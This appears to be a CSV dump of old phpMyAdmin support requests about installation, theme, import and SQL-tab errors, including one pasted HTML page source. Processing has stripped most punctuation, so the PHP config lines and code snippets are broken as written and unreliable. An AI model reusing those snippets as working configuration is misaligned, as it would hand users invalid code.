some hosts like yahoo also hate .htaccses as well just hope an file libray.php version were avail for picky hosts Original URL https sourceforge.net p phpmyadmin support requests 982 https sourceforge.net p phpmyadmin support requests 982 Original author wolfstar359","bug"
"24444","2803","CSS is not loading at all.
Hi, i upgraded today to the last version and the css is not loading at all, so it only showing the odd txt without format, no background, etc.
I did search the forums and none of the solutions there worked.
Version 2.10.1 PHP4 Here is the link to my phpmyadmin http 70.85.162.116 phpmyAdmin Any help will be appreciated.
Thank you!
Original URL https sourceforge.net p phpmyadmin support requests 1026 https sourceforge.net p phpmyadmin support requests 1026 Original author manokiss Found in version Latest Git","bug"
"24444","2804","pma looks strange after install.
the installation of phpmyadmin i tried both 2.9.0.3 and 2.9.1.1) looks odd in the main frame on the right).
When i attempt to make SQL Queries i either get You probably tried to upload too large file or import.php Missing parameter import type import.php Missing parameter format when using import).
it s almost as if half the stylesheet is missing.
i am using firefox2, windowsXP, php5.2, apache2.2, mysql5.
Original URL https sourceforge.net p phpmyadmin support requests 983 https sourceforge.net p phpmyadmin support requests 983 Original author konnetikut Found in version Latest Git","bug"
"24444","2805","The field count is empty!
.
I just installed phpmyadmin and I have loved it for several years).
Fresh copy on a fresh server, set everything up correctly.
Was able to create a new database with no problem, but when I go to add a table to the database, I put in the table name and the number of fields, I click Go and I get an error screen that says The field count is empty!
.
Any ideas?
Am I missing something?
Cookies and everything are enabled.
I tried it in Internet Explorer and Firefox.
Any help is greatly appreciated!
I am running version 2.10.1 Original URL https sourceforge.net p phpmyadmin support requests 1028 https sourceforge.net p phpmyadmin support requests 1028 Original author tdors Found in version Latest Git","bug"
"24444","2806","opening themes dir fails with restrictions.
Opening of themes dir fails when restrictions are in place.
Following errors occured Warning opendir ) [function.opendir] open basedir restriction in effect.
File .
themes) is not within the allowed path s) home int2000 31251 tmp usr local share pear) in usr home int2000 31251 html sqladmin libraries Theme Manager.class.php on line 238 Warning opendir .
themes) [function.opendir] failed to open dir Operation not permitted in usr home int2000 31251 html sqladmin libraries Theme Manager.class.php on line 238 Warning phpMyAdmin ERROR cannot open themes folder .
themes in usr home int2000 31251 html sqladmin libraries Theme Manager.class.php on line 256 in config file cfg[ ThemePath ] = .
themes ; I had to change the next function from libraries Theme manager.class.php read all themes function loadThemes ) \{ this gt;themes = array ); next line was changed if handleThemes = opendir home int2000 31251 html sqladmin themes )) \{ check for themes directory while false !== PMA Theme = readdir handleThemes))) \{ if array key exists PMA Theme, this gt;themes)) \{ this does nothing!
this gt;themes[ PMA Theme] = this gt;themes[ PMA Theme]; continue; \} new theme = PMA Theme load this gt;getThemesPath ) .
.
PMA Theme); if new theme) \{ new theme gt;setId PMA Theme); this gt;themes[ PMA Theme] = new theme; \} \} end get themes closedir handleThemes); \} else \{ trigger error phpMyAdmin ERROR cannot open themes folder .
this gt;getThemesPath ), E USER WARNING); return false; \} end check for themes directory ksort this gt;themes); return true; \} Server version 4.1.20 MySQL client version 5.0.24a phpMyAdmin 2.9.1.1 PHP version 5.1.6 Original URL https sourceforge.net p phpmyadmin support requests 984 https sourceforge.net p phpmyadmin support requests 984 Original author sakarikl","bug"
"24444","2807","xammp doesn t work either.... xampp didn t work either...
Cannot load mysql extension.
Please check your PHP configuration.
Documentation I read on some forum to replace the ntwdblib.dll file gt; I did replace it but that didn t help.
Any advice?
Original URL https sourceforge.net p phpmyadmin support requests 1030 https sourceforge.net p phpmyadmin support requests 1030 Original author joemad","bug"
"24444","2808","Problem with CSV import in pma2911 2.6.4 pl4 was OK).
I try import data from CSV file.
When I try import line1 text1 , line1 text2 , line1 text3 line2 text1 , line2 text2 , line2 text3 line3 text1 , line3 text2 , line3 text3 everything is OK, but when i try import next line line4 text1 , line4 text2 , line4 text3 its not.
Earlier version 2.6.4 pl4 imported this example without problem.
How can I resolve this problem?
Original URL https sourceforge.net p phpmyadmin support requests 985 https sourceforge.net p phpmyadmin support requests 985 Original author macka2","bug"
"24444","2809","After Import of database, left pane will not refresh.
I import a database that already exists.
Everything works fine.
I select the database from the pulldown in the left pane.
The right pane will display correctly but the left pane will not refresh with the listing of tables in the database I just imported.
To make it appear correctly I have to select another database, then go back to the one I just imported.
Original URL https sourceforge.net p phpmyadmin support requests 986 https sourceforge.net p phpmyadmin support requests 986 Original author buhrietoe","bug"
"24444","2810","usind sql query.
when i tried to use the sql query window with the following query delete from forums where CreatedIn gt;= 2006 12 24 00 00 00 AND CreatedIn lt; 2006 12 25 00 00 00 i got in the phpmyadmin window phpMyAdmin index.php) an error Warning Cannot modify header information headers already sent by output started at usr local cpanel base 3rdparty phpMyAdmin libraries header meta style.inc.php 27) in usr local cpanel base 3rdparty phpMyAdmin libraries common.lib.php on line 1154 Original URL https sourceforge.net p phpmyadmin support requests 989 https sourceforge.net p phpmyadmin support requests 989 Original author sufinoon","bug"
"24444","2811","SQL.
when entering SQL commands on the tab SQL of any database I receive an error of PHP Warning Cannot modify header information headers already sent by output started at D \Program Files\xampp\phpMyAdmin\libraries\header meta style.inc.php 27) in D \Program Files\xampp\phpMyAdmin\libraries\common.lib.php on line 1154 I Just Put CREATE DATABASE juan; Original URL https sourceforge.net p phpmyadmin support requests 990 https sourceforge.net p phpmyadmin support requests 990 Original author ellokomen","bug"
"24444","2812","system hangs when accessing 1 000 000 rows.
phpmyadmin version 2.9.1.1 mysql version 5.1 php version 5.2 running on laptop with winxp pro when i m trying to open database with 1 000 000 rows 18 table and most of rows are inside 4 specific tables) the computer locks up... hd works like crazy and i need to restart entire system.
I guess that phpmyadmin runs some heavy queries there...
I can access the same database through mysql administrator utility without any problem...
Original URL https sourceforge.net p phpmyadmin support requests 992 https sourceforge.net p phpmyadmin support requests 992 Original author stuckhere","bug"
"24444","2813","incorrect display, frame errors.
Incorrect display of table data I am using multilingual tables and my own system phpMyAdmin 2.6.3 rc1 with MySQL 5.0.24 community nt displays correctly the system on sourceforge does not phpMyAdmin 2.8.1 MySQL 4.1.21 standard log MySQL charset UTF 8 Unicode utf8) Note the code displayed on my web pages are not affected by this bug, it appears that the text extracted from the table is being handled as ansi instead of unicode utf 8 as the page is rendered as utf 8 All attempts to use this in the hebrew language fail as the frames are incorrectly handled, this seems to affect arabic too!
Original URL https sourceforge.net p phpmyadmin support requests 993 https sourceforge.net p phpmyadmin support requests 993 Original author peteridunne Found in version 2.8.1","bug"
"24444","2814","only db does not accept value from PHP AUTH USER.
The following entry in config.inc.php does not seem to work with Version 2.9.1.1 cfg[ Servers ][ i][ only db ] = SERVER[ PHP AUTH USER ]; I m using this for a long time and numerous versions of PHPMyAdmin.
But actually PHPMyAdmin shows all databases without taking care of this parameter.
Rest of the config as followed cfg[ Servers ][ i][ host ] = localhost ; cfg[ Servers ][ i][ extension ] = mysql ; cfg[ Servers ][ i][ connect type ] = tcp ; cfg[ Servers ][ i][ compress ] = false; cfg[ Servers ][ i][ auth type ] = http ; cfg[ Servers ][ i][ only db ] = SERVER[ PHP AUTH USER ]; Serversystem PHP Version 4.4.4 MySQL 4.1.21 max log Original URL https sourceforge.net p phpmyadmin support requests 994 https sourceforge.net p phpmyadmin support requests 994 Original author mkdfx","bug"
"24444","2815","mbstring`.
I have been using 2.8.1 WITH NO PROBLEMS!!!
I downloaded 2.9.1.1 and imediately get a; The mbstring PHP extension was not found and you seem to be using a multibyte charset.
Without the mbstring extension phpMyAdmin is unable to split strings correctly and it may result in unexpected results.
I tried it with and without the Language setting same result; Language and charset conversion settings Default language to use, if not browser defined or user defined cfg[ DefaultLang ] = en iso 8859 1 ; Default connection collation used for MySQL gt;= 4.1) cfg[ DefaultConnectionCollation ] = utf8 unicode ci ; Since I am running on a GoDaddy virtual host I do NOT have access to download and install mbstring.dll nor anything else!
Why is this comming up now, and how do I get around the problem, which is not a problem with 2.8.1?
Original URL https sourceforge.net p phpmyadmin support requests 995 https sourceforge.net p phpmyadmin support requests 995 Original author jraff","bug"
"24444","2816","Cannot use string offset as an array in Table.class.php.
Hi, I have this error Fatal error Cannot use string offset as an array in pma libraries Table.class.php on line 567 with phpMyAdmin 2.9.1.1 AND 2.9.2 rc1 My config MacOS X 10.4.8 Apache 2.2.3 installed by DarwinPorts) MySQL 4.1.20 installed by DarwinPorts) phpMyAdmin 2.9.1.1 AND 2.9.2 rc1 Firefox 2.0.0.1 Context I want to rename a database.
A new database is created but the copy of the data failed.
The new database is empty and the old database is unchanged.
Thanks Original URL https sourceforge.net p phpmyadmin support requests 996 https sourceforge.net p phpmyadmin support requests 996 Original author pbollard","bug"
"24444","2817","Re use the interface.
Hi all, i d like to write an open source database administration tool under gnu) for Microsoft databases.
Does the phpmyadmin GNU licence allow me to re use its graphical items and all its GUIs for my tool ?
thks in advance, Have fun, Matrix Original URL https sourceforge.net p phpmyadmin support requests 997 https sourceforge.net p phpmyadmin support requests 997 Original author matrxxxxx","bug"
"24444","2818","Config changes are not reflected until logout login.
Upon making changes to my config.inc.php, specifically changing the authentication methods from cookie to http these and other config changes were not reflected until my current session expired I manually cleared my cookies after refreshing a few times) I ve listed this under security because I feel that if you make a change, especially one relating to AUTH it needs to be reflected instantly even for all users who are already logged in.
Although I haven t tested it a move from config based auth gt; cookie or http auth not being properly reflected would be a serious security flaw.
If you all disagree I m more then happy to roshambo over this, vollmer on irc.freenode.net just privmsg me.
Original URL https sourceforge.net p phpmyadmin support requests 998 https sourceforge.net p phpmyadmin support requests 998 Original author vollmerk Found in version Latest Git","bug"
"24444","2819","Having a Problem Still Please Help!.
Yeah I need a step by step instruction for dummies I swear lol.
I m still using wampserver and go to phpmyadmin no big problem there.
Your configuration file contains settings root with no password) that correspond to the default MySQL privileged account.
Your MySQL server is running with this default, is open to intrusion, and you really should fix this security hole.
That error above shows up and I put a password on through privillages where you would set up a password and then I go back and I run into the error page and yet it won t take me to the phpmyadmin login screen can you please tell me in easy terms how to set it up properly so that it works.
I m sorry for the bad punctuation.
Thank You!
Original URL https sourceforge.net p phpmyadmin support requests 1041 https sourceforge.net p phpmyadmin support requests 1041 Original author chill bud","bug"
"24444","2820","error.
hi i get this error General Error SQL ERROR [ mysql4 ] Can t open file phpbb topics.MYI .
errno 145) [1016] SQL SELECT t. , tp.topic posted, tt.mark time FROM phpbb topics t) LEFT JOIN phpbb topics posted tp ON tp.topic id = t.topic id AND tp.user id = 2) LEFT JOIN phpbb topics track tt ON tt.topic id = t.topic id AND tt.user id = 2) WHERE t.forum id IN 2, 0) AND t.topic type IN 2, 3) ORDER BY t.topic time DESC BACKTRACE FILE includes db mysql.php LINE 132 CALL dbal gt;sql error ) FILE viewforum.php LINE 338 CALL dbal mysql gt;sql query ) could some1 help me please cos now my forum is not working Original URL https sourceforge.net p phpmyadmin support requests 999 https sourceforge.net p phpmyadmin support requests 999 Original author masterman22","bug"
"24444","2821","Missing theme.class.php in 2.9.2 All Language.
Downloaded phpMyAdmin 2.9.2 all languages utf 8 only.tar.bz2 today and got error about missing file when running setup.php in the script dir.
Warning main .
libraries Theme.class.php) failed to open stream No such file or directory in var www phpMyAdmin libraries common.lib.php on line 593 Fatal error main ) Failed opening required .
libraries Theme.class.php include path= .
usr share php usr share pear ) in var www phpMyAdmin libraries common.lib.php on line 593 Opened common.lib.php and line 593 is an include line for Theme.class.php.
File was not included in download.
Fixed by downloading phpMyAdmin 2.9.2 english.tar.bz2 and coping over the Theme.class.php from the libary folder.
Original URL https sourceforge.net p phpmyadmin support requests 1000 https sourceforge.net p phpmyadmin support requests 1000 Original author nutty jk","bug"
"24444","2822","Messed style in right frame, invalid cookie phpmyadmin css?.
From time to time exact reason unknown), the cookie phpmyadmin css phpMyAdmin seems to get messed up, the result is a distorted style for the right frame e.g.
the overview page lists all information in one column with full width, instead of MySQL server details on the left half and phpMyAdmin details on the right half.
I have to delete the cookie phpmyadmin css phpMyAdmin in the Cookie manager of Opera 9.2x and refresh the page, then the style appears correctly again.
Original URL https sourceforge.net p phpmyadmin support requests 1043 https sourceforge.net p phpmyadmin support requests 1043 Original author ligh1l","bug"
"24444","2823","data transfer.
Hello, i want to transfer my existing data from one database to another database.
i tried to use copy function but it didnt worked out .
it creates problem while copy a blog.
i also tried to copy via getting each variable from one database and transfering it via php., but the same problem blob remains vacant.
Is there any way to copy the database without downloading from one account to another.
i am using a server on shared hosting..so its creating problem.
Please suggest.
Regards Tarun www.thevinayak.com Original URL https sourceforge.net p phpmyadmin support requests 1001 https sourceforge.net p phpmyadmin support requests 1001 Original author tarun ce","bug"
"24444","2824","left side panel does not show up.
after logging on, selecting one of my servers then I select a database on the left frame I get the error msg NOT FOUND the requested URL left.php was not found on this server.
I also checked in the directory and it isn t there.
Thanks, Jordan Original URL https sourceforge.net p phpmyadmin support requests 1002 https sourceforge.net p phpmyadmin support requests 1002 Original author ludicruz","bug"
"24444","2825","Error 0101634C on click browse tab.
On click in the browse tab to show data of any table of any database, I received a error PHP has encountered an Access Violation at 0101634C .
I m search the problema without success.
I use 2.083 and updated to 2.9.2 version.
The error persist.
MySQL 4.0.26 PHP Version 5.1.6 Thank for you help and attention.
Original URL https sourceforge.net p phpmyadmin support requests 1003 https sourceforge.net p phpmyadmin support requests 1003 Original author giovaneh Found in version Latest Git","bug"
"24444","2826","Create function delimiter.
I am not able to CREATE FUNCTION in SQL BOX of in PHPAdmin, I think for the delimiter problems.
How can I work around because I can t use gt;mysql ?
Best regards Giovanni Rossati Original URL https sourceforge.net p phpmyadmin support requests 1004 https sourceforge.net p phpmyadmin support requests 1004 Original author bellecombe","bug"
"24444","2827","<Table> declaration missing.
When I run an SQL statement with a join across 2 tables, e.g.
SELECT username,field12 FROM user,userfield where user.userid=4810 and user.userid=userfield.userid The resulting page looks to me like it) is missing a lt;table gt; declaration meaning that the output looks garbled.
Here is the source code lt;!DOCTYPE html PUBLIC W3C DTD XHTML 1.0 Transitional EN http www.w3.org TR xhtml1 DTD xhtml1 transitional.dtd gt; lt;html xmlns= http www.w3.org 1999 xhtml xml lang= en lang= en dir= ltr gt; lt;head gt; lt;link rel= icon href= .
favicon.ico type= image x icon gt; lt;link rel= shortcut icon href= .
favicon.ico type= image x icon gt; lt;title gt;phpMyAdmin lt; title gt; lt;meta http equiv= Content Type content= text html; charset=utf 8 gt; lt;link rel= stylesheet type= text css href= .
css phpmyadmin.css.php?token=94e99dfd2dd3d9cf8c7c3d9ad3aa44fe amp;amp;js frame=right gt; lt;link rel= stylesheet type= text css href= .
css print.css?token=94e99dfd2dd3d9cf8c7c3d9ad3aa44fe media= print gt; lt;script type= text javascript language= javascript gt; lt;!
[CDATA[ Updates the title of the frameset if possible ns4 does not allow this) if typeof parent.document) != undefined typeof parent.document) != unknown typeof parent.document.title) == string ) \{ parent.document.title = www.avforums.com mysql.avforums.com vbulletin user | phpMyAdmin 2.9.2 ; \} js form validation stuff var errorMsg0 = Missing value in the form!
; var errorMsg1 = This is not a number!
; var noDropDbMsg = ; var confirmMsg = Do you really want to ; var confirmMsgDropDB = You are about to DESTROY a complete database!
; ]] gt; lt; script gt; lt;script src= .
js functions.js type= text javascript language= javascript gt; lt; script gt; lt;script src= .
js tooltip.js type= text javascript language= javascript gt; lt; script gt; lt;meta name= OBGZip content= true gt; lt;!
[if IE 6] gt; lt;style type= text css gt; lt;!
[CDATA[ html \{ overflow y scroll; \} ]] gt; lt; style gt; lt;!
[endif] gt; lt; head gt; lt;body gt; lt;div id= TooltipContainer onmouseover= holdTooltip ); onmouseout= swapTooltip default ); gt; lt; div gt; lt;div id= serverinfo gt; lt;a href= main.php?token=94e99dfd2dd3d9cf8c7c3d9ad3aa44fe class= item gt; lt;img class= icon src= .
themes darkblue orange img s host.png width= 16 height= 16 alt= gt; Server mysql.avforums.com lt; a gt; lt;span class= separator gt; lt;img class= icon src= .
themes darkblue orange img item ltr.png width= 5 height= 9 alt= gt; lt; span gt; lt;a href= db details structure.php?db=vbulletin amp;amp;token=94e99dfd2dd3d9cf8c7c3d9ad3aa44fe class= item gt; lt;img class= icon src= .
themes darkblue orange img s db.png width= 16 height= 16 alt= gt; Database vbulletin lt; a gt; lt;span class= separator gt; lt;img class= icon src= .
themes darkblue orange img item ltr.png width= 5 height= 9 alt= gt; lt; span gt; lt;a href= tbl properties structure.php?db=vbulletin amp;amp;table=user amp;amp;token=94e99dfd2dd3d9cf8c7c3d9ad3aa44fe class= item gt; lt;img class= icon src= .
themes darkblue orange img s tbl.png width= 16 height= 16 alt= gt; Table user lt; a gt; lt; div gt; lt;div id= topmenucontainer gt; lt;ul id= topmenu gt; lt;li gt; lt;a class= tab href= sql.php?db=vbulletin amp;amp;table=user amp;amp;token=94e99dfd2dd3d9cf8c7c3d9ad3aa44fe amp;amp;goto=tbl properties.php amp;amp;back=tbl properties.php amp;amp;pos=0 gt; lt;img class= icon src= .
themes darkblue orange img b browse.png width= 16 height= 16 alt= Browse gt;Browse lt; a gt; lt; li gt; lt;li gt; lt;a class= tab href= tbl properties structure.php?db=vbulletin amp;amp;table=user amp;amp;token=94e99dfd2dd3d9cf8c7c3d9ad3aa44fe amp;amp;goto=tbl properties.php amp;amp;back=tbl properties.php gt; lt;img class= icon src= .
themes darkblue orange img b props.png width= 16 height= 16 alt= Structure gt;Structure lt; a gt; lt; li gt; lt;li gt; lt;a class= tab href= tbl properties.php?db=vbulletin amp;amp;table=user amp;amp;token=94e99dfd2dd3d9cf8c7c3d9ad3aa44fe amp;amp;goto=tbl properties.php amp;amp;back=tbl properties.php gt; lt;img class= icon src= .
themes darkblue orange img b sql.png width= 16 height= 16 alt= SQL gt;SQL lt; a gt; lt; li gt; lt;li gt; lt;a class= tab href= tbl select.php?db=vbulletin amp;amp;table=user amp;amp;token=94e99dfd2dd3d9cf8c7c3d9ad3aa44fe amp;amp;goto=tbl properties.php amp;amp;back=tbl properties.php gt; lt;img class= icon src= .
themes darkblue orange img b search.png width= 16 height= 16 alt= Search gt;Search lt; a gt; lt; li gt; lt;li gt; lt;a class= tab href= tbl change.php?db=vbulletin amp;amp;table=user amp;amp;token=94e99dfd2dd3d9cf8c7c3d9ad3aa44fe amp;amp;goto=tbl properties.php amp;amp;back=tbl properties.php gt; lt;img class= icon src= .
themes darkblue orange img b insrow.png width= 16 height= 16 alt= Insert gt;Insert lt; a gt; lt; li gt; lt;li gt; lt;a class= tab href= tbl properties export.php?db=vbulletin amp;amp;table=user amp;amp;token=94e99dfd2dd3d9cf8c7c3d9ad3aa44fe amp;amp;goto=tbl properties.php amp;amp;back=tbl properties.php amp;amp;single table=true gt; lt;img class= icon src= .
themes darkblue orange img b tblexport.png width= 16 height= 16 alt= Export gt;Export lt; a gt; lt; li gt; lt;li gt; lt;a class= tab href= tbl import.php?db=vbulletin amp;amp;table=user amp;amp;token=94e99dfd2dd3d9cf8c7c3d9ad3aa44fe amp;amp;goto=tbl properties.php amp;amp;back=tbl properties.php gt; lt;img class= icon src= .
themes darkblue orange img b tblimport.png width= 16 height= 16 alt= Import gt;Import lt; a gt; lt; li gt; lt;li gt; lt;a class= tab href= tbl properties operations.php?db=vbulletin amp;amp;table=user amp;amp;token=94e99dfd2dd3d9cf8c7c3d9ad3aa44fe amp;amp;goto=tbl properties.php amp;amp;back=tbl properties.php gt; lt;img class= icon src= .
themes darkblue orange img b tblops.png width= 16 height= 16 alt= Operations gt;Operations lt; a gt; lt; li gt; lt;li gt; lt;a class= tabcaution href= sql.php?db=vbulletin amp;amp;table=user amp;amp;token=94e99dfd2dd3d9cf8c7c3d9ad3aa44fe amp;amp;goto=tbl properties.php amp;amp;back=tbl properties.php amp;amp;sql query=TRUNCATE TABLE 60user 60 amp;amp;zero rows=Table user has been emptied amp;amp;goto=tbl properties structure.php onclick= return confirmLink this, TRUNCATE TABLE `user` ) gt; lt;img class= icon src= .
themes darkblue orange img b empty.png width= 16 height= 16 alt= Empty gt;Empty lt; a gt; lt; li gt; lt;li gt; lt;a class= tabcaution href= sql.php?db=vbulletin amp;amp;table=user amp;amp;token=94e99dfd2dd3d9cf8c7c3d9ad3aa44fe amp;amp;goto=tbl properties.php amp;amp;back=tbl properties.php amp;amp;reload=1 amp;amp;purge=1 amp;amp;sql query=DROP TABLE 60user 60 amp;amp;goto=db details structure.php amp;amp;zero rows=Table user has been dropped onclick= return confirmLink this, DROP TABLE `user` ) gt; lt;img class= icon src= .
themes darkblue orange img b deltbl.png width= 16 height= 16 alt= Drop gt;Drop lt; a gt; lt; li gt; lt; ul gt; lt;div class= clearfloat gt; lt; div gt; lt; div gt; lt;br gt; lt;script type= text javascript language= javascript gt; lt;!
[CDATA[ window.parent.updateTableTitle vbulletin.user , 154,217 Rows) ); ]] gt; lt; script gt; lt;br gt; lt;div align= left gt; Showing rows 0 0 1 total, Query took 0.0059 sec) lt;fieldset class= gt; lt;legend gt;SQL query lt; legend gt; lt;span class= syntax gt; lt;span class= syntax alpha syntax alpha reservedWord gt;SELECT lt; span gt; lt;span class= syntax alpha syntax alpha identifier gt;username lt; span gt; lt;span class= syntax punct syntax punct listsep gt;, lt; span gt; lt;span class= syntax alpha syntax alpha identifier gt;field12 lt; span gt; lt;br gt; lt;span class= syntax alpha syntax alpha reservedWord gt;FROM lt; span gt; lt;span class= syntax alpha syntax alpha identifier gt;user lt; span gt; lt;span class= syntax punct syntax punct listsep gt;, lt; span gt; lt;span class= syntax alpha syntax alpha identifier gt;userfield lt; span gt; lt;br gt; lt;span class= syntax alpha syntax alpha reservedWord gt;WHERE lt; span gt; lt;span class= syntax alpha syntax alpha identifier gt;user lt; span gt; lt;span class= syntax punct syntax punct qualifier gt;.
lt; span gt; lt;span class= syntax alpha syntax alpha identifier gt;userid lt; span gt; lt;span class= syntax punct gt;= lt; span gt; lt;span class= syntax digit syntax digit integer gt;4810 lt; span gt; lt;br gt; lt;span class= syntax alpha syntax alpha reservedWord gt;AND lt; span gt; lt;span class= syntax alpha syntax alpha identifier gt;user lt; span gt; lt;span class= syntax punct syntax punct qualifier gt;.
lt; span gt; lt;span class= syntax alpha syntax alpha identifier gt;userid lt; span gt; lt;span class= syntax punct gt;= lt; span gt; lt;span class= syntax alpha syntax alpha identifier gt;userfield lt; span gt; lt;span class= syntax punct syntax punct qualifier gt;.
lt; span gt; lt;span class= syntax alpha syntax alpha identifier gt;userid lt; span gt; lt;span class= syntax white syntax white newline gt; lt; span gt; lt;br gt; lt;span class= syntax alpha syntax alpha reservedWord gt;LIMIT lt; span gt; lt;span class= syntax digit syntax digit integer gt;0 lt; span gt; lt;span class= syntax punct syntax punct listsep gt;, lt; span gt; lt;span class= syntax digit syntax digit integer gt;30 lt; span gt; lt; span gt; lt;fieldset class= tblFooters gt; [ lt;a href= tbl properties.php?db=vbulletin amp;amp;table=user amp;amp;token=94e99dfd2dd3d9cf8c7c3d9ad3aa44fe amp;amp;sql query=SELECT username 2Cfield12 FROM user 2Cuserfield where user.userid 3D4810 and user.userid 3Duserfield.userid amp;amp;show query=1 querybox onclick= window.parent.focus querywindow SELECT username,field12 FROM user,userfield where user.userid=4810 and user.userid=userfield.userid ); return false; gt;Edit lt; a gt; ] [ lt;a href= import.php?db=vbulletin amp;amp;table=user amp;amp;token=94e99dfd2dd3d9cf8c7c3d9ad3aa44fe amp;amp;sql query=EXPLAIN SELECT username 2Cfield12 FROM user 2Cuserfield where user.userid 3D4810 and user.userid 3Duserfield.userid gt;Explain SQL lt; a gt; ] [ lt;a href= import.php?db=vbulletin amp;amp;table=user amp;amp;token=94e99dfd2dd3d9cf8c7c3d9ad3aa44fe amp;amp;show query=1 amp;amp;sql query=SELECT username 2Cfield12 FROM user 2Cuserfield where user.userid 3D4810 and user.userid 3Duserfield.userid amp;amp;show as php=1 gt;Create PHP Code lt; a gt; ] [ lt;a href= import.php?db=vbulletin amp;amp;table=user amp;amp;token=94e99dfd2dd3d9cf8c7c3d9ad3aa44fe amp;amp;show query=1 amp;amp;sql query=SELECT username 2Cfield12 FROM user 2Cuserfield where user.userid 3D4810 and user.userid 3Duserfield.userid gt;Refresh lt; a gt; ] lt; fieldset gt; lt; div gt; lt;br gt; lt;fieldset gt; lt;legend gt;Query results operations lt; legend gt; lt;!
Print view gt; lt;a href= sql.php?db=vbulletin amp;amp;table=user amp;amp;token=94e99dfd2dd3d9cf8c7c3d9ad3aa44fe amp;amp;pos=0 amp;amp;session max rows=30 amp;amp;disp direction=horizontal amp;amp;repeat cells=100 amp;amp;printview=1 amp;amp;sql query=SELECT username 2Cfield12 FROM user 2Cuserfield where user.userid 3D4810 and user.userid 3Duserfield.userid target= print view gt; lt;img class= icon src= .
themes darkblue orange img b print.png height= 16 width= 16 alt= Print view gt;Print view lt; a gt; amp;nbsp; amp;nbsp; lt;a href= sql.php?db=vbulletin amp;amp;table=user amp;amp;token=94e99dfd2dd3d9cf8c7c3d9ad3aa44fe amp;amp;pos=0 amp;amp;session max rows=30 amp;amp;disp direction=horizontal amp;amp;repeat cells=100 amp;amp;printview=1 amp;amp;sql query=SELECT username 2Cfield12 FROM user 2Cuserfield where user.userid 3D4810 and user.userid 3Duserfield.userid amp;amp;dontlimitchars=1 target= print view gt; lt;img class= icon src= .
themes darkblue orange img b print.png height= 16 width= 16 alt= Print view with full texts) gt;Print view with full texts) lt; a gt; lt;!
Export gt; amp;nbsp; amp;nbsp; lt;a href= tbl properties export.php?db=vbulletin amp;amp;table=user amp;amp;token=94e99dfd2dd3d9cf8c7c3d9ad3aa44fe amp;amp;pos=0 amp;amp;session max rows=30 amp;amp;disp direction=horizontal amp;amp;repeat cells=100 amp;amp;printview=1 amp;amp;sql query=SELECT username 2Cfield12 FROM user 2Cuserfield where user.userid 3D4810 and user.userid 3Duserfield.userid amp;amp;unlim num rows=1 gt; lt;img class= icon src= .
themes darkblue orange img b tblexport.png height= 16 width= 16 alt= Export gt;Export lt; a gt; lt; fieldset gt; lt;br gt; lt;!
Navigation bar gt; lt;table border= 0 cellpadding= 2 cellspacing= 0 gt; lt;tr gt; lt;td gt; amp;nbsp; amp;nbsp; amp;nbsp; lt; td gt; lt;td align= center gt; lt;form action= sql.php method= post onsubmit= return checkFormElementInRange this, session max rows , d is not valid row number.
, 1) amp;amp; amp;amp; checkFormElementInRange this, pos , d is not valid row number.
, 0, 0)) gt; lt;input type= hidden name= db value= vbulletin gt; lt;input type= hidden name= table value= user gt; lt;input type= hidden name= token value= 94e99dfd2dd3d9cf8c7c3d9ad3aa44fe gt; lt;input type= hidden name= sql query value= SELECT username 2Cfield12 FROM user 2Cuserfield where user.userid 3D4810 and user.userid 3Duserfield.userid gt; lt;input type= hidden name= goto value= tbl properties.php gt; lt;input type= hidden name= dontlimitchars value= 0 gt; lt;input type= submit name= navig value= Show gt; lt;input type= text name= session max rows size= 3 value= 30 class= textfield onfocus= this.select ) gt; row s) starting from record lt;input type= text name= pos size= 6 value= 0 class= textfield onfocus= this.select ) gt; lt;br gt; in lt;select name= disp direction gt; lt;option value= horizontal selected= selected gt;horizontal lt; option gt; lt;option value= horizontalflipped gt;horizontal rotated headers) lt; option gt; lt;option value= vertical gt;vertical lt; option gt; lt; select gt; mode and repeat headers after lt;input type= text size= 3 name= repeat cells value= 100 class= textfield gt; cells lt; form gt; lt; td gt; lt;td gt; amp;nbsp; amp;nbsp; amp;nbsp; lt; td gt; lt; tr gt; lt; table gt; lt;thead gt; lt;tr gt; lt;th colspan= 2 gt; lt;a href= sql.php?db=vbulletin amp;amp;table=user amp;amp;token=94e99dfd2dd3d9cf8c7c3d9ad3aa44fe amp;amp;sql query=SELECT username 2Cfield12 FROM user 2Cuserfield where user.userid 3D4810 and user.userid 3Duserfield.userid amp;amp;session max rows=30 amp;amp;pos=0 amp;amp;disp direction=horizontal amp;amp;repeat cells=100 amp;amp;goto=tbl properties.php amp;amp;dontlimitchars=1 gt; lt;img class= fulltext src= .
themes darkblue orange img s fulltext.png width= 50 height= 20 alt= Full Texts title= Full Texts gt; lt; a gt; lt; th gt; lt; tr gt; lt;tr gt; lt;th gt;username lt; th gt; lt;th gt;field12 lt; th gt; lt; tr gt; lt; thead gt; lt;tbody gt; lt;tr class= odd gt; lt;td class= gt;Jeff lt; td gt; lt;td class= gt;VaderL lt; td gt; lt; tr gt; lt; tbody gt; lt; table gt; lt;br gt; lt;!
Navigation bar gt; lt;table border= 0 cellpadding= 2 cellspacing= 0 gt; lt;tr gt; lt;td gt; amp;nbsp; amp;nbsp; amp;nbsp; lt; td gt; lt;td align= center gt; lt;form action= sql.php method= post onsubmit= return checkFormElementInRange this, session max rows , d is not valid row number.
, 1) amp;amp; amp;amp; checkFormElementInRange this, pos , d is not valid row number.
, 0, 0)) gt; lt;input type= hidden name= db value= vbulletin gt; lt;input type= hidden name= table value= user gt; lt;input type= hidden name= token value= 94e99dfd2dd3d9cf8c7c3d9ad3aa44fe gt; lt;input type= hidden name= sql query value= SELECT username 2Cfield12 FROM user 2Cuserfield where user.userid 3D4810 and user.userid 3Duserfield.userid gt; lt;input type= hidden name= goto value= tbl properties.php gt; lt;input type= hidden name= dontlimitchars value= 0 gt; lt;input type= submit name= navig value= Show gt; lt;input type= text name= session max rows size= 3 value= 30 class= textfield onfocus= this.select ) gt; row s) starting from record lt;input type= text name= pos size= 6 value= 0 class= textfield onfocus= this.select ) gt; lt;br gt; in lt;select name= disp direction gt; lt;option value= horizontal selected= selected gt;horizontal lt; option gt; lt;option value= horizontalflipped gt;horizontal rotated headers) lt; option gt; lt;option value= vertical gt;vertical lt; option gt; lt; select gt; mode and repeat headers after lt;input type= text size= 3 name= repeat cells value= 100 class= textfield gt; cells lt; form gt; lt; td gt; lt;td gt; amp;nbsp; amp;nbsp; amp;nbsp; lt; td gt; lt; tr gt; lt; table gt; lt;script type= text javascript language= javascript gt; lt;!
